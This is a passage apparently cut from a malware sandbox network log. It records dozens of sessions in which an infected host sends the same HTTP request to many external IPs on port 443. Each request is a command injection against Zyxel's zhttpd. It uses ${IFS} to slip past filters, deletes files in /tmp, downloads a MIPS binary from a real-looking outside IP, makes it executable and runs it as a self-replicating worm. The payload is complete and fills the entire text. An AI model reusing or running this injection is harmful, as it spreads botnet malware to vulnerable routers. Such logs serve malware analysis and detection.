                                        Jan 14, 2024 16:18:40.352206945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3109192.168.2.1350112220.3.134.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352236032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3110192.168.2.1348622105.225.142.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352287054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3111192.168.2.1351438172.111.127.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352329969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3112192.168.2.1357682156.207.210.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352359056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3113192.168.2.133795872.154.248.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352385044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3114192.168.2.1351488121.170.250.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352416992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3115192.168.2.134046847.62.13.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352458000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3116192.168.2.1340860190.129.82.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352487087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3117192.168.2.1349810210.147.134.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352538109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3118192.168.2.1358938150.223.84.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352586985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3119192.168.2.135885474.166.196.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352621078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3120192.168.2.1358300223.200.211.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352679014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3121192.168.2.1350236158.100.133.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352706909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3122192.168.2.1343736200.222.64.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352741003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3123192.168.2.1335764153.237.166.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352799892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3124192.168.2.135261651.75.133.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352839947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3125192.168.2.135260234.30.75.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352885008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3126192.168.2.1344088136.85.42.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352967024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3127192.168.2.133635687.168.183.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352993965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3128192.168.2.1343066207.174.9.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353033066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3129192.168.2.1348874138.154.104.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353065968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3130192.168.2.1339116209.29.241.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353121996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3131192.168.2.134518837.202.200.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353153944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3132192.168.2.135638820.47.196.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353195906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3133192.168.2.134656220.245.187.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353244066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3134192.168.2.1356414104.116.58.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353282928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3135192.168.2.1359536204.60.149.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353319883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3136192.168.2.134139271.178.71.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353355885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3137192.168.2.135776212.160.191.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353415012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3138192.168.2.133392879.137.237.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353434086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3139192.168.2.1346180181.156.177.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353488922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3140192.168.2.136053068.133.148.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353518963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3141192.168.2.135597697.137.14.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353553057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3142192.168.2.1333612203.176.177.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353590012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3143192.168.2.1343742120.6.133.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353651047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3144192.168.2.133599053.39.30.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353686094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3145192.168.2.133754678.240.242.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353734016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3146192.168.2.1358082173.226.43.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353759050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3147192.168.2.133735458.166.254.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353782892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3148192.168.2.135018263.81.254.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353840113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3149192.168.2.1333274195.1.194.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353878975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3150192.168.2.1360522125.128.89.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353935957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3151192.168.2.133382694.190.139.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.353970051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3152192.168.2.1341320117.137.238.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354029894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3153192.168.2.1352278174.12.220.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354067087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3154192.168.2.1350178100.7.167.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354099035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3155192.168.2.135227661.225.109.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354132891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3156192.168.2.1355404194.103.123.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354167938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3157192.168.2.1343020108.142.69.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354207039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3158192.168.2.1352692104.230.126.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354258060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3159192.168.2.1350270102.79.16.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354299068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3160192.168.2.1339074108.168.103.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354338884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3161192.168.2.1337798158.100.43.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354382992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3162192.168.2.1359674192.162.207.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354406118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3163192.168.2.1337804158.67.95.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354428053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3164192.168.2.133308072.165.233.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354476929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3165192.168.2.1339010152.12.9.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354530096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3166192.168.2.1339514145.32.92.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354578972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3167192.168.2.1345986156.57.233.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354604959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3168192.168.2.1350400111.252.28.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354662895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3169192.168.2.134063490.81.237.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354701996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3170192.168.2.1337948185.68.129.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354741096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3171192.168.2.1347630112.93.141.125443
                                        TimestampBytes transferredDirectionData
